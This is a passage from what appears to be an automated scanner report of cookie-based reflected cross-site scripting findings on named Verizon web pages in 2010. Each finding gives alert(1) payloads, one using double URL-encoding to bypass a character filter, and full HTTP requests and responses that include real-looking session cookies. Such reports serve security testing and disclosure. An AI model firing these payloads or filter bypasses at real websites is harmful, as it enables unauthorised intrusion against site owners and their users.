<DIV style="FLOAT: left" id=yourlocation>TX4AFCD<SCRIPT>ALERT(1)</SCRIPT>F5636EF73BE </DIV>
...[SNIP]...

1.150. http://www22.verizon.com/residential/bundles/overview [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/overview

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload e9210<script>alert(1)</script>17637724fdd was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/overview HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXe9210<script>alert(1)</script>17637724fdd; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 112505
Expires: Sat, 20 Nov 2010 00:15:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:15:44 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:44 GMT; path=/
Set-Cookie: ContextInfo_State=TXe9210<script>alert(1)</script>17637724fdd; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:44 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:44 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:44 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXE9210<SCRIPT>ALERT(1)</SCRIPT>17637724FDD </DIV>
...[SNIP]...

1.151. http://www22.verizon.com/residential/bundles/overview [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/overview

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4e8e6'><script>alert(1)</script>b8d520065ab was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/overview HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX4e8e6'><script>alert(1)</script>b8d520065ab; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 110967
Expires: Sat, 20 Nov 2010 00:15:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:15:43 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:43 GMT; path=/
Set-Cookie: ContextInfo_State=TX4e8e6'><script>alert(1)</script>b8d520065ab; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:43 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:43 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:43 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX4E8E6'><SCRIPT>ALERT(1)</SCRIPT>B8D520065AB ' />
...[SNIP]...

1.152. http://www22.verizon.com/residential/internet [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/internet

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 6913f<script>alert(1)</script>c0ed5cd13fb was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/internet HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX6913f<script>alert(1)</script>c0ed5cd13fb; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73111
Expires: Sat, 20 Nov 2010 00:16:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:16:32 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX6913f<script>alert(1)</script>c0ed5cd13fb; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Internet
</title><meta name="keywords" content="verizon internet services, verizon internet products, ISP, internet service, fios internet
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX6913F<SCRIPT>ALERT(1)</SCRIPT>C0ED5CD13FB </DIV>
...[SNIP]...

1.153. http://www22.verizon.com/residential/internet [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/internet

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bf607'><script>alert(1)</script>af83f93894c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/internet HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXbf607'><script>alert(1)</script>af83f93894c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73115
Expires: Sat, 20 Nov 2010 00:16:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:16:28 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXbf607'><script>alert(1)</script>af83f93894c; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Internet
</title><meta name="keywords" content="verizon internet services, verizon internet products, ISP, internet service, fios internet
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXBF607'><SCRIPT>ALERT(1)</SCRIPT>AF83F93894C ' />
...[SNIP]...

1.154. http://www22.verizon.com/residential/specialoffers/ [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/specialoffers/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e20b%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253efd5bffbcc6f was submitted in the vzapps cookie. This input was echoed as 4e20b"><img src=a onerror=alert(1)>fd5bffbcc6f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the vzapps cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /residential/specialoffers/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX4e20b%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253efd5bffbcc6f; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Expires: Sat, 20 Nov 2010 00:15:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:15:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASPSESSIONIDQQCTSBDQ=IGIKCPNBAEMHJEFBAIDLEPPI; path=/
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660;path=/
Content-Length: 126538



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>


<title>Verizon | Residential Specia
...[SNIP]...
<script type="text/javascript" src="/residential/specialoffers/zipcheck?st=TX4e20b"><img src=a onerror=alert(1)>fd5bffbcc6f">
...[SNIP]...

1.155. http://www22.verizon.com/residentialhelp [ECSPCookies cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residentialhelp

Issue detail

The value of the ECSPCookies cookie is copied into the HTML document as plain text between tags. The payload 4fea9<script>alert(1)</script>38ddcfffc57 was submitted in the ECSPCookies cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residentialhelp?fromDotNet=true HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vzAppID=; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; V347=CT-2; LOB_CATEGORY=; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; Product=A; ProductXML=A; vzpers=STATE=TX; canigetfios=Y; showpromo=Y; vzapps=STATE=TX; ContextInfo_Internet=HighSpeed; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; ECSPCookies=Partner=VZO&SolutionCenter=HighSpeed&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=4fea9<script>alert(1)</script>38ddcfffc57; IHAClientIP=112.64.2.103; CMS_TimeZoneOffset=360; RecentlyVisited=Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290217656258:ss=1290217656258; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; CP=null*; refURL=http://www22.verizon.com/content/verizonglobalhome/ghp_business.aspx; BusinessUnit=business

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 46458
Expires: Sat, 20 Nov 2010 02:12:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:12:53 GMT
Connection: close
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 02:17:53 GMT; path=/residentialhelp/; domain=verizon.com

<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | Residential Support
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Microsoft Vis
...[SNIP]...
</strong> 4fea9<script>alert(1)</script>38ddcfffc57</span>
...[SNIP]...

1.156. http://www22.verizon.com/residentialhelp [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residentialhelp

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload bbbc1<script>alert(1)</script>763928accef was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residentialhelp?fromDotNet=true HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vzAppID=; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; V347=CT-2; LOB_CATEGORY=; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; Product=A; ProductXML=A; vzpers=STATE=TX; canigetfios=Y; showpromo=Y; vzapps=STATE=TXbbbc1<script>alert(1)</script>763928accef; ContextInfo_Internet=HighSpeed; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; ECSPCookies=Partner=VZO&SolutionCenter=HighSpeed&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; IHAClientIP=112.64.2.103; CMS_TimeZoneOffset=360; RecentlyVisited=Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290217656258:ss=1290217656258; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; CP=null*; refURL=http://www22.verizon.com/content/verizonglobalhome/ghp_business.aspx; BusinessUnit=business

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 46458
Expires: Sat, 20 Nov 2010 02:12:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:12:52 GMT
Connection: close
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 02:17:52 GMT; path=/residentialhelp/; domain=verizon.com

<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | Residential Support
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Microsoft Vis
...[SNIP]...
</strong>, TXbbbc1<script>alert(1)</script>763928accef </span>
...[SNIP]...

1.157. http://www22.verizon.com/residentialhelp/ [ECSPCookies cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residentialhelp/

Issue detail

The value of the ECSPCookies cookie is copied into the HTML document as plain text between tags. The payload efb2c<script>alert(1)</script>d7c9c2d6cea was submitted in the ECSPCookies cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residentialhelp/ HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-sf=false; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vzAppID=; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; V347=CT-2; LOB_CATEGORY=; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; Product=A; ProductXML=A; vzpers=STATE=TX; canigetfios=Y; showpromo=Y; vzapps=STATE=TX; ContextInfo_Internet=HighSpeed; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; ECSPCookies=Partner=VZO&SolutionCenter=HighSpeed&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=efb2c<script>alert(1)</script>d7c9c2d6cea; IHAClientIP=112.64.2.103; CMS_TimeZoneOffset=360; RecentlyVisited=Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290217656258:ss=1290217656258; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; CP=null*; refURL=http://www22.verizon.com/content/verizonglobalhome/ghp_business.aspx; BusinessUnit=business

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 46458
Expires: Sat, 20 Nov 2010 02:12:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:12:40 GMT
Connection: close

<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | Residential Support
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Microsoft Vis
...[SNIP]...
</strong> efb2c<script>alert(1)</script>d7c9c2d6cea</span>
...[SNIP]...

1.158. http://www22.verizon.com/residentialhelp/ [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residentialhelp/

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 55f0d<script>alert(1)</script>c68ab98df45 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residentialhelp/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX55f0d<script>alert(1)</script>c68ab98df45; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 175791
Expires: Sat, 20 Nov 2010 00:22:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:22:06 GMT
Connection: close

<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | Residential Support
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Microsoft Vis
...[SNIP]...
</strong>, TX55f0d<script>alert(1)</script>c68ab98df45 </span>
...[SNIP]...

1.159. http://www22.verizon.com/residentialhelp/phone [ECSPCookies cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residentialhelp/phone

Issue detail

The value of the ECSPCookies cookie is copied into the HTML document as plain text between tags. The payload f9aa6<script>alert(1)</script>cdcfbe4067 was submitted in the ECSPCookies cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residentialhelp/phone HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: autosuggest=on; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vzAppID=; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; V347=CT-2; LOB_CATEGORY=; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; Product=A; ProductXML=A; vzpers=STATE=TX; canigetfios=Y; showpromo=Y; vzapps=STATE=TX; ContextInfo_Internet=HighSpeed; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; ECSPCookies=Partner=VZO&SolutionCenter=HighSpeed&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=f9aa6<script>alert(1)</script>cdcfbe4067; IHAClientIP=112.64.2.103; RecentlyVisited=Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290217656258:ss=1290217656258; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; BusinessUnit=business; CMS_TimeZoneOffset=360; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; 